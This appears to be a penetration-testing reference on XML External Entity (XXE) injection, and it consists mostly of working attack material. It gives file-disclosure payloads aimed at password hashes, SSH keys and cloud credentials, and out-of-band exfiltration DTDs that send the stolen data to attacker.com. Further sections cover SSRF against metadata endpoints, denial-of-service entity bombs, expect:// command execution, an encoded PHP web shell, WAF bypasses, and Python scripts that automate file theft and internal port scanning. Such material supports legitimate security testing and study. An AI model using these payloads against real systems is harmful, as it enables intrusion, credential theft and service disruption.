XML External Entity (XXE)
XML External Entity (XXE) injection is a web security vulnerability that lets an attacker interfere with how an application processes XML data. It can lead to disclosure of confidential data, denial of service, server-side request forgery (SSRF), and, in specific configurations, code execution.
How It Works
XXE vulnerabilities arise when an XML parser resolves external entity references in untrusted XML input. For example:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>
If the parser has external entities enabled, it reads /etc/passwd and substitutes its contents for &xxe; during XML processing, potentially exposing the file to the attacker.
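For contrast, here is a minimal sketch of what a parser that does not resolve external entities does with the same document. It uses Python's standard-library `xml.etree.ElementTree`, which is documented as not expanding external entities; the helper name `try_parse` is illustrative only, and other parsers or configurations may behave differently.

```python
import xml.etree.ElementTree as ET

PAYLOAD = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>&xxe;</data>"""


def try_parse(xml_text: str) -> str:
    """Return the root element's text, or a short note if the parser rejects the input."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # ElementTree refuses the unresolved external entity reference.
        return f"rejected: {exc}"
    return root.text or ""


if __name__ == "__main__":
    print(try_parse(PAYLOAD))
```

A vulnerable parser would instead return the file contents as the text of `<data>`.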
Detection
Manual Testing
Basic XXE Tests
Testing for basic XXE vulnerabilities:
# Step 1: Identify XML input
# Look for Content-Type: application/xml
# Look for XML in POST body
# Check file uploads accepting XML formats
# Step 2: Test with basic external entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
<data>&xxe;</data>
</root>
# Step 3: Check response
# - File contents visible: Direct XXE
# - Error message with path: Information disclosure
# - No response but delay: Blind XXE possible
# Step 4: Test with HTTP callback
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://your-server.com/xxe-test">
]>
<root>
<data>&xxe;</data>
</root>
# Check your server for incoming request
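The two probes above differ only in the system identifier, so they can be generated from one template. The following is a small sketch under that assumption; `build_xxe_payload` and its parameters are hypothetical names, not part of any tool mentioned here.

```python
def build_xxe_payload(system_uri: str, root: str = "root", entity: str = "xxe") -> str:
    """Build a test document whose single external entity points at system_uri."""
    if '"' in system_uri:
        # The system identifier is wrapped in double quotes below.
        raise ValueError("system_uri must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY {entity} SYSTEM "{system_uri}">\n'
        "]>\n"
        f"<{root}>\n<data>&{entity};</data>\n</{root}>"
    )


if __name__ == "__main__":
    # Step 2 probe (local file) and Step 4 probe (HTTP callback).
    print(build_xxe_payload("file:///etc/passwd"))
    print(build_xxe_payload("http://your-server.com/xxe-test"))
```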
Parameter Entity Tests
Testing with parameter entities:
# Basic parameter entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
%xxe;
]>
<root></root>
# External DTD with parameter entity
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# evil.dtd content:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfil;
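The external DTD can be generated rather than hand-written. This sketch assumes a hypothetical helper `build_exfil_dtd`; the point it illustrates is that the percent sign of the nested declaration is written as the character reference `&#x25;`, because a literal `%` inside an entity value would be read as the start of a parameter-entity reference.

```python
def build_exfil_dtd(file_uri: str, collector_url: str) -> str:
    """Return DTD text that reads file_uri and appends it to collector_url as ?data=..."""
    return (
        f'<!ENTITY % file SYSTEM "{file_uri}">\n'
        # &#x25; becomes a literal '%' only when %eval; is expanded.
        f"<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM '{collector_url}?data=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


if __name__ == "__main__":
    print(build_exfil_dtd("file:///etc/passwd", "http://attacker.com/"))
```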
File Upload XXE Tests
Testing XXE through file uploads:
# SVG file with XXE
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg width="500" height="500" xmlns="http://www.w3.org/2000/svg">
<text x="0" y="20">&xxe;</text>
</svg>
# DOCX file with XXE
# Unzip DOCX file
# Edit word/document.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<w:document>
<w:body>
<w:p>
<w:r>
<w:t>&xxe;</w:t>
</w:r>
</w:p>
</w:body>
</w:document>
# XLSX file with XXE
# Edit xl/workbook.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<workbook>&xxe;</workbook>
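The unzip, edit, and re-zip steps for DOCX and XLSX files can be scripted with the standard library. The sketch below is one possible approach: `inject_doctype` is a hypothetical helper that only inserts the DOCTYPE after the XML declaration of one archive member; the `&xxe;` reference still has to be placed in a text node of that member separately.

```python
import io
import zipfile

DOCTYPE = '<!DOCTYPE foo [\n<!ENTITY xxe SYSTEM "file:///etc/passwd">\n]>\n'


def inject_doctype(archive: bytes, member: str, doctype: str = DOCTYPE) -> bytes:
    """Return a copy of the archive with doctype inserted into the named XML member."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == member:
                text = data.decode("utf-8")
                if text.startswith("<?xml"):
                    # Keep the XML declaration first, then the DOCTYPE.
                    head, _, tail = text.partition("?>")
                    text = f"{head}?>\n{doctype}{tail.lstrip()}"
                else:
                    text = doctype + text
                data = text.encode("utf-8")
            dst.writestr(info.filename, data)
    return out.getvalue()
```

For a DOCX the member would be `word/document.xml`, for an XLSX `xl/workbook.xml`.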
SOAP XXE Tests
Testing XXE in SOAP requests:
# Basic SOAP XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getUser>
<username>&xxe;</username>
</getUser>
</soap:Body>
</soap:Envelope>
# SOAP with external DTD
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<getData/>
</soap:Body>
</soap:Envelope>
Blind XXE Tests
Testing when output is not reflected:
# Out-of-band XXE with DNS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# evil.dtd:
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://%file;.attacker.com/'>">
%all;
%send;
# Out-of-band with HTTP
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# evil.dtd:
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?data=%file;'>">
%all;
%send;
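When the file is read through `php://filter/convert.base64-encode`, the callback arrives with the data base64-encoded in the query string. The following sketch decodes a logged request target; `decode_callback` is a hypothetical helper and the parameter name `data` is taken from the `?data=` used in the DTD above.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_callback(request_target: str, param: str = "data") -> str:
    """Extract and base64-decode the exfiltrated value from a logged request target."""
    values = parse_qs(urlsplit(request_target).query).get(param)
    if not values:
        raise ValueError(f"no {param!r} parameter in {request_target!r}")
    # parse_qs turns '+' into a space; restore it before decoding.
    encoded = values[0].replace(" ", "+")
    # Re-pad in case trailing '=' characters were lost in transit.
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


if __name__ == "__main__":
    sample = base64.b64encode(b"root:x:0:0:root:/root:/bin/bash\n").decode()
    print(decode_callback("/?data=" + sample))
```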
Automated Discovery
Using Burp Suite
# Step 1: Identify XML endpoints
# Filter Burp history for Content-Type: application/xml
# Or look for XML in request bodies
# Step 2: Send to Repeater
# Test with basic XXE payload
# Step 3: Use Burp Collaborator
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR-SUBDOMAIN">
]>
# Step 4: Use Burp Extensions
# Install: Content Type Converter
# Install: Freddy, Deserialization Bug Finder
Using XXEinjector
# Basic file extraction
xxeinjector --host=target.com --path=/upload --file=request.txt \
--oob=http --phpfilter
# Port enumeration (--enumports checks which ports are unfiltered for reverse connections)
xxeinjector --host=target.com --path=/api --file=request.txt \
--oob=http --enumports
# Advanced options
xxeinjector --host=target.com --path=/endpoint \
--file=request.txt \
--oob=http \
--phpfilter \
--direct=PARAMETER \
--xslt
Using Nuclei
# Run XXE templates
nuclei -u https://target.com -t xxe/
# Specific XXE checks
nuclei -u https://target.com -t xxe/blind-xxe.yaml
# With custom headers
nuclei -u https://target.com -t xxe/ -H "Authorization: Bearer TOKEN"
Attack Vectors
Local File Disclosure
Reading local files through XXE:
# Linux files
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
# Common Linux targets
file:///etc/passwd # User accounts
file:///etc/shadow # Password hashes (if accessible)
file:///etc/hosts # Host file
file:///etc/hostname # System hostname
file:///proc/self/environ # Environment variables
file:///proc/self/cmdline # Process command line
file:///proc/net/tcp # Network connections
file:///proc/net/fib_trie # Network routes
file:///root/.ssh/id_rsa # SSH private key
file:///root/.bash_history # Command history
# Windows files
file:///c:/windows/win.ini
file:///c:/windows/system32/drivers/etc/hosts
file:///c:/boot.ini
file:///c:/windows/system32/config/sam
# Application files
file:///var/www/html/config.php
file:///var/www/.env
file:///home/user/.aws/credentials
PHP Wrappers Exploitation
Using PHP wrappers for advanced file access:
# Base64 encode file content (avoids parse errors from characters such as < and &)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>
# Read PHP source code
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=config.php">
]>
<root>&xxe;</root>
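# Supply PHP source through data:// (the parser only returns the decoded text; it runs only if the application later includes or evaluates it)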
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-decode/resource=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=">
]>
<root>&xxe;</root>
# Read POST data
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://input">
]>
<root>&xxe;</root>
SSRF via XXE
Using XXE to perform SSRF attacks:
# Internal network scanning
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://192.168.1.1/">
]>
<root>&xxe;</root>
# AWS metadata
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>
# Internal services
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://localhost:8080/admin">
]>
<root>&xxe;</root>
# Gopher protocol for service exploitation
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/_INFO">
]>
<root>&xxe;</root>
Denial of Service
DoS attacks through XXE:
# Billion Laughs Attack (Exponential Entity Expansion)
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
# External entity pointing at an endless stream
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///dev/random">
]>
<root>&xxe;</root>
# Recursive entity definition
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe "&xxe;">
]>
<root>&xxe;</root>
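The cost of the Billion Laughs payload follows directly from its shape: each level repeats the previous one a fixed number of times. A short sketch of the arithmetic, with `expanded_size` as an illustrative helper name:

```python
def expanded_size(base: str = "lol", fan_out: int = 10, levels: int = 9) -> int:
    """Characters produced when the top-level entity is fully expanded."""
    # Each of the `levels` entities repeats the previous one `fan_out` times.
    return len(base) * fan_out ** levels


if __name__ == "__main__":
    print(expanded_size())            # payload above: 3 characters * 10**9
    print(expanded_size(levels=3))    # a harmless size for local testing
```

A document of under one kilobyte therefore asks the parser for roughly three gigabytes of text, which is why parsers that cap entity expansion are not affected.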
Blind XXE with OOB Data Exfiltration
Exfiltrating data when no output is visible:
# Step 1: Injection payload
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# Step 2: evil.dtd on attacker server
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/collect?data=%file;'>">
%all;
%send;
# Step 3: With base64 encoding (for special characters)
# Injection:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<root></root>
# evil.dtd:
<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/collect?data=%file;'>">
%all;
%send;
XInclude Attacks
Using XInclude when DOCTYPE is not controllable:
# Basic XInclude
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
# XInclude with URL
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="http://attacker.com/evil.xml"/>
</root>
# XInclude in SOAP
<soap:Body xmlns:xi="http://www.w3.org/2001/XInclude">
<getUser>
<xi:include parse="text" href="file:///etc/passwd"/>
</getUser>
</soap:Body>
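Because the XInclude namespace declaration travels with the element, the fragment can be built programmatically and dropped into whatever value the server embeds in its own document. A minimal sketch with the standard library follows; `build_xinclude` is a hypothetical helper name.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"
ET.register_namespace("xi", XI_NS)  # serialize with the conventional xi: prefix


def build_xinclude(href: str, wrapper: str = "root") -> str:
    """Return a wrapper element containing one xi:include that pulls href as text."""
    root = ET.Element(wrapper)
    ET.SubElement(root, f"{{{XI_NS}}}include", {"parse": "text", "href": href})
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print(build_xinclude("file:///etc/passwd"))
```

The include is only processed if the server-side parser has XInclude support switched on.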
Bypass Techniques
DTD Restrictions Bypass
Bypassing DTD blocking:
# Using XInclude (no DOCTYPE needed)
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
# XLIFF file format (the DOCTYPE must precede the root element)
<!DOCTYPE xliff [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xliff version="1.2" xmlns="urn:oasis:names:tc:xliff:document:1.2">
<file>
<body>
<trans-unit>
<source>&xxe;</source>
</trans-unit>
</body>
</file>
</xliff>
# SVG file (the DOCTYPE must precede the root element)
<!DOCTYPE svg [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text>&xxe;</text>
</svg>
Entity Reference Bypass
Alternative entity syntax:
# Hexadecimal entity encoding
<!ENTITY xxe "&#x66;&#x69;&#x6c;&#x65;:///etc/passwd">
# Decimal entity encoding
<!ENTITY xxe "&#102;&#105;&#108;&#101;:///etc/passwd">
# Using CDATA
<!ENTITY xxe "<![CDATA[file:///etc/passwd]]>">
# Character references
<!ENTITY % file "file:///etc/passwd">
Protocol Bypass
Using alternative protocols:
# When file:// is blocked, try others
<!ENTITY xxe SYSTEM "http://localhost/file">
<!ENTITY xxe SYSTEM "https://localhost/file">
<!ENTITY xxe SYSTEM "ftp://localhost/file">
<!ENTITY xxe SYSTEM "php://filter/resource=/etc/passwd">
<!ENTITY xxe SYSTEM "expect://ls">
<!ENTITY xxe SYSTEM "data://text/plain;base64,SGVsbG8=">
# Gopher for raw TCP
<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/_INFO">
# Dictionary protocol
<!ENTITY xxe SYSTEM "dict://127.0.0.1:11211/stats">
Encoding Bypass
Different encoding methods:
# UTF-16 encoding
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
# UTF-7 encoding (rare but possible)
<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
# HTML entities in URLs
<!ENTITY xxe SYSTEM "file:///etc/passwd">
# URL encoding
<!ENTITY xxe SYSTEM "file%3a%2f%2f%2fetc%2fpasswd">
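A UTF-16 declaration only works if the bytes on the wire really are UTF-16. The sketch below re-encodes a payload accordingly; `to_utf16` is a hypothetical helper, and big-endian with a byte order mark is an arbitrary choice made here for illustration.

```python
import codecs


def to_utf16(payload: str) -> bytes:
    """Re-encode payload as big-endian UTF-16 with a BOM and a matching declaration."""
    declared = payload.replace('encoding="UTF-8"', 'encoding="UTF-16"')
    return codecs.BOM_UTF16_BE + declared.encode("utf-16-be")


if __name__ == "__main__":
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\n'
        "<root>&xxe;</root>"
    )
    body = to_utf16(xml)
    # The ASCII byte sequence a naive filter looks for is no longer present.
    print(b"<!ENTITY" in body)
```

Every ASCII character is now separated by a zero byte, so filters that match on raw byte patterns may miss the declaration while a conforming parser still decodes it.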
Content-Type Manipulation
Changing content-type to trigger XML parsing:
# Original request (JSON)
POST /api/user HTTP/1.1
Content-Type: application/json
{"username":"test"}
# Change to XML
POST /api/user HTTP/1.1
Content-Type: application/xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user>
<username>&xxe;</username>
</user>
# Try variations
Content-Type: text/xml
Content-Type: application/x-xml
Content-Type: application/xhtml+xml
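Converting the original JSON body into an equivalent XML body is mechanical for flat objects. This is a sketch only: `json_to_xml` is a hypothetical helper, the root element name `user` is a guess at what the endpoint expects, and nested objects or arrays are not handled.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(body: str, root_name: str = "user") -> str:
    """Convert a flat JSON object into an XML element with one child per key."""
    root = ET.Element(root_name)
    for key, value in json.loads(body).items():
        ET.SubElement(root, key).text = str(value)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    print(json_to_xml('{"username":"test"}'))
```

The DOCTYPE and the `&xxe;` reference are then spliced into the resulting string by hand, since assigning `&xxe;` as element text would be escaped to `&amp;xxe;` on serialization.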
WAF Bypass
Evading WAF detection:
# Case variation
<!DOCTYPE foo [<!EnTiTy xxe SYSTEM "file:///etc/passwd">]>
<!doctype foo [<!entity xxe SYSTEM "file:///etc/passwd">]>
# Whitespace and newlines
<!DOCTYPE foo [
<!ENTITY
xxe
SYSTEM
"file:///etc/passwd"
>
]>
# Comments
<!DOCTYPE foo [<!--comment--><!ENTITY xxe SYSTEM "file:///etc/passwd"><!--comment-->]>
# Mixed encoding
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
# Multiple DOCTYPE declarations
<!DOCTYPE foo>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
Post-Exploitation
Sensitive File Extraction
Systematically extracting valuable files:
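# Python script for automated file extraction
import base64
import re

import requests

files_to_read = [
    "/etc/passwd",
    "/etc/shadow",
    "/etc/hosts",
    "/root/.ssh/id_rsa",
    "/var/www/html/config.php",
    "/var/www/.env",
    "/proc/self/environ",
]
url = "https://target.com/api/xml"


def extract_content(body):
    # Assumption: the endpoint echoes the entity value inside <root>...</root>;
    # adjust the pattern to match the real response format.
    match = re.search(r"<root>(.*?)</root>", body, re.DOTALL)
    if match is None:
        raise ValueError("entity value not found in response")
    return match.group(1).strip()


for file_path in files_to_read:
    # Using PHP filter for base64 encoding
    payload = f'''<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={file_path}">
]>
<root>&xxe;</root>'''
    response = requests.post(url, data=payload, headers={
        'Content-Type': 'application/xml'
    }, timeout=10)
    if response.status_code == 200:
        try:
            # Extract base64 content
            content = extract_content(response.text)
            decoded = base64.b64decode(content).decode(errors="replace")
            print(f"[+] {file_path}:")
            print(decoded)
            print("-" * 50)
        except ValueError:
            # Raised by extract_content and by b64decode on malformed input
            print(f"[-] Failed to extract: {file_path}")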
Cloud Credentials via XXE
Extracting cloud metadata:
# AWS credentials (IMDSv1 only; IMDSv2 requires a session token header)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>&xxe;</root>
# Then extract specific role
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE-NAME]">
]>
<root>&xxe;</root>
# Azure credentials (requires the Metadata: true header, may not work)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/">
]>
<root>&xxe;</root>
# GCP credentials (requires header, may not work)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<root>&xxe;</root>
Internal Port Scanning
Scanning internal networks:
# Port scanning via XXE
import requests

target_url = "https://vulnerable.com/api/xml"
internal_ip = "192.168.1.100"
ports = [21, 22, 23, 25, 80, 443, 3306, 5432, 6379, 8080]
for port in ports:
    payload = f'''<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://{internal_ip}:{port}/">
]>
<root>&xxe;</root>'''
    try:
        response = requests.post(target_url, data=payload, timeout=5,
                                 headers={"Content-Type": "application/xml"})
        # Heuristic: a closed port usually surfaces as "Connection refused"
        # in the parser error echoed by the application
        if "Connection refused" not in response.text:
            print(f"[+] Port {port} appears open")
    except requests.Timeout:
        print(f"[*] Port {port} timeout (possibly filtered)")
    except requests.RequestException as exc:
        print(f"[-] Port {port}: request failed ({exc})")
Code Execution via XXE
Achieving RCE in specific scenarios:
# Expect protocol (if expect extension enabled in PHP)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://ls">
]>
<root>&xxe;</root>
# Execute command
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://whoami">
]>
<root>&xxe;</root>
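# Via a planted file (PHP)
# Note: an external entity only reads a resource; it does not write to disk
# or execute code by itself, so this chain needs a separate write or include primitive
# Step 1: Fetch attacker-controlled content over FTP (if FTP wrapper enabled)
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "ftp://user:pass@localhost/shell.php">
]>
<root>&xxe;</root>
# Step 2: Read back a planted file to confirm its path and contents
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/resource=/tmp/shell.php">
]>
<root>&xxe;</root>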
Common Tools
| Tool | Description | Primary Use Case |
|---|---|---|
| XXEinjector | XXE exploitation tool | Automated XXE testing |
| Burp Suite | Web vulnerability scanner | Manual XXE testing |
| OXML_XXE | XXE in Office documents | Document-based XXE |
| xmllint | XML parser | Local testing |
| XXExploiter | XXE exploitation framework | Advanced XXE exploitation |
| Nuclei | Vulnerability scanner | XXE detection |